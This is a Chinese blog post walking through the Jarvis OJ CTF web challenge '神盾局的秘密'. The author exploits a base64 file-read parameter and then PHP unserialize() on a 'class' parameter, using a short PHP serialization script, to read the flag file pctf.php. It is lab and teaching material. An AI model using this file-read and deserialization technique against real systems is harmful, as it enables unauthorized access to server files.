Jarvis-神盾局的秘密

最新推荐文章于 2020-09-02 09:36:46 发布
最新推荐文章于 2020-09-02 09:36:46 发布
阅读量1.2k 收藏
点赞数 2
分类专栏: CTF之Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/82948886
版权

神盾局的秘密

时间:2018年10月5日 汇报人:王祎洁

题目

http://web.jarvisoj.com:32768/
在这里插入图片描述

题解

打开网页,发现一张图片,查看页面源代码,发现图片是从showing.php中读取的,且img=base64编码
在这里插入图片描述

并将其读入
在这里插入图片描述

发现是图片编码

尝试读取已知showing.php文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

尝试读取index.php文件
在这里插入图片描述
在这里插入图片描述

查看页面源代码后,发现shield.php文件
在这里插入图片描述

读取shield.php文件,发现flag is in pctf.php
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

尝试读取pctf.php文件,发现不存在
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

重新审计index.php文件的页面源代码,与shield.php页面源代码
在这里插入图片描述

发现参数输入class以及反序列化函数,以及过滤

根据shield.php源代码,编写序列化脚本

<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filename;
		}
		
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
	$x = new Shield('pctf.php');
	echo serialize($x);
?>

发在本地运行,得到class参数的赋值
在这里插入图片描述

地址栏输入后,查看页面源代码,发现flag
在这里插入图片描述

  • PS:用本地跑pctf.php(序列化脚本),我用的是phpstudy,将写好的脚本放到phpstudy的www文件下,之后本地访问:127.0.0.1/pctf.php即可
  • 另外,hackbar是个好东西?
  • 关于序列化函数:serialize( )
    https://www.w3cschool.cn/php/php-serialize_info.html
白衣w
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvis-api:JARVIS系统的API部分
05-16
jarvis-api [WIP] JARVIS:只是一个非常智能的系统 该项目是JARVIS系统的API部分。 它是用于管理您的忙碌生活的各种插件的集合。 (将用于UI前端。) 安装 您将需要来运行服务器。 安装完成后,在项目文件夹中运行...
jarvis-client:虚拟助手,帮助您管理忙碌的生活
05-18
jarvis-client [WIP] JARVIS:只是一个非常智能的系统 该项目是JARVIS系统的Web UI部分。 (您还需要和一些插件。)它充当虚拟助手来管理您的忙碌生活,帮助您达到零和或负数的“收件箱”。 安装 您将需要 , 和来...
Jarvis OJ 神盾秘密
沐目的博客
04-19 631
Jarvis OJ 神盾秘密 首先打开网页后,发现一张图片,下载下来看了一下,没有什么发现。让后回到刚才的网页,打开控制器,发现图片是以文件包含的形式传过来的,所以就可以联想,它既然可以包含图片,那应该也就可以包含文件。于是我们需要在url里面试,我们目前就只知道有一个叫showimg.php的文件,所以我们就从它开始试。base64转码后,提交到url, 让后成功访问了,打开页面原代码,看见...
神盾秘密
筱阳的博客
12-21 340
题目地址 :http://web.jarvisoj.com:32768/       一般套路,先看HTTP头,源码   通过扫网站发现存在index.pnp 访问也没有什么东西 尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php    将index.php进行base64试试: view-source:htt...
jarvis oj 神盾秘密 wp
欢迎来到神林的博客
09-12 384
jarvis oj 中的反序列化 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
PCTF 神盾秘密
偷一个月亮
09-02 505
http://web.jarvisoj.com:32768/ 文件包含读源码 index.php <?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize(...
神盾特工的背景知识 SHIELD的等级制度
syh_486_007的专栏
02-12 8446
神盾(S.H.I.E.L.D.),全称为“国土战略防御攻击与后勤保障”。 ​ 作为一个漫画中虚构的特工组织,神盾也存在着十分缜密的特工等级制度。 那么此处插播一条广告:本周三,《神盾特工》第三季继DOX剧场之后登录DOXTV,敬请收看! 好!DOX课堂开课了,追看《神盾》但不是看得很明白,多半是搞不清楚等级制度闹得,接着往下看,就好了~ ​
Python库 | jarvis-tools-2021.12.16.tar.gz
03-08
《Python库:jarvis-tools-2021.12.16的深度解析》 在编程领域,Python因其简洁的语法和丰富的库支持而深受开发者喜爱。本文将重点介绍一个名为"jarvis-tools"的Python库,其版本为2021.12.16,封装在一个名为...
JARVIS--AI-Based-Assistant:简单的JARVIS语音助手
04-06
**JARVIS--AI-Based-Assistant: 简单的JARVIS语音助手** JARVIS,这个名字来源于漫威电影中的贾维斯人工智能系统,现在我们将其应用到一个基于AI的语音助手中。这个项目主要使用Python编程语言来实现,为用户提供了...
Jarvis-Assisant:Jarvis Assisant是执行基本任务的虚拟助手
04-07
首先阅读 这是有关如何使用Python的Library JarvisAI( )的示例脚本 该脚本始终使用最新版本的JarvisAI和最新示例。 入门- 克隆仓库。 pip install -r requirements.txt来安装所有需求,您可能需要手动安装某些...
蓝桥杯 算法提高 盾神与条状项链
你真的介意真的在乎真的想要真的渴望的话你一定能够做到
02-22 1550
算法提高 盾神与条状项链   时间限制:1.0s   内存限制:256.0MB      问题描述   有一天,盾神捡到了好多好多五颜六色的珠子!他心想这些珠子这么漂亮,可以做成一条项链然后送给他心仪的女生~于是他用其中一些珠子做成了长度为n的项链。当他准备把项链首尾相接的时候,土方进来了。   “哇这么恶心的项链你也做得出来!!!”   盾神自知审美不是他
五颜六色的日志
feitianxuxue的专栏
07-09 1927
日志打印 根据cout颜色的处理,封装了一个日志处理函数。一个小小的工具,方便日志调试。 "\33[0m" :白色 "\33[1m\33[34m":蓝色 "\33[1m\33[33m":黄色 "\33[1m\33[31m":红色 "\33[1m\33[35m":粉色 "\33[1m\33[32m":绿色 根据此进行封装 直接贴代码 文件log.h #ifndef LOG_H #
神盾
weixin_44455958的博客
03-08 295
ctf与PHP千丝万缕的联系
UP's blog
01-10 1533
参考链接:<https://www.restran.net/2016/09/26/php-security-notes/>不得不说,大佬写的十分好
BugkuCTF-web-前女友 writeup
会下雪的晴天
07-13 608
题目描述 题目传送门:http://123.206.31.85:49162/ 解题思路 打开链接一大段文字,,,没什么有用的,,嗯,PHP是世界上最好的语言 老套路,先看看源码再说 不看源码还真是看不出来这有个链接,打开这个隐蔽链接后得到: <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isse...
收到一个神盾的offer,怎么样?
瞬息之间
05-12 344
漫威十一年系列总结性的电影《复联4》正在热映,而衍生出的一部和漫威宇宙关联的美剧《神盾特工》,今年我也在陆陆续续地看。一开始预期的是一部特工加一些科幻或魔幻元素的剧集,...
蓝桥 算法提高 盾神与条状项链
K3_14的博客
04-06 552
#include #include #include using namespace std; int n,m,p,q; char s[5]; int main() { while (~scanf ("%d%d",&n,&m)) { vector v; for (int i=0;i<n;i++) { scanf ("%d",&p); v.push_back(p);
Error: Cannot find module '@babel/plugin-proposal-object-rest-spread' Require stack: - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\plugins.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\config\files\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@babel\core\lib\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-plugin-babel\index.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\lib\Service.js - D:\workspace-hjm\jarvis-cmc\node_modules\@vue\cli-service\bin\vue-cli-service.js - Did you mean "@babel/plugin-transform-object-rest-spread"? Make sure that all the Babel plugins and presets you are using are defined as dependencies or devDependencies in your package.json file. It's possible that the missing plugin is loaded by a preset you are using that forgot to add the plugin to its dependencies: you can workaround this problem by explicitly adding the missing package to your top-level package.json.
最新发布
07-22
这个错误提示表明在你的项目中找不到 `@babel/plugin-proposal-object-rest-spread` 这个模块。这可能是由于缺少该模块或者配置问题导致的。 解决方法如下: 1. 确保你的项目中已经安装了 `@babel/plugin-proposal...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值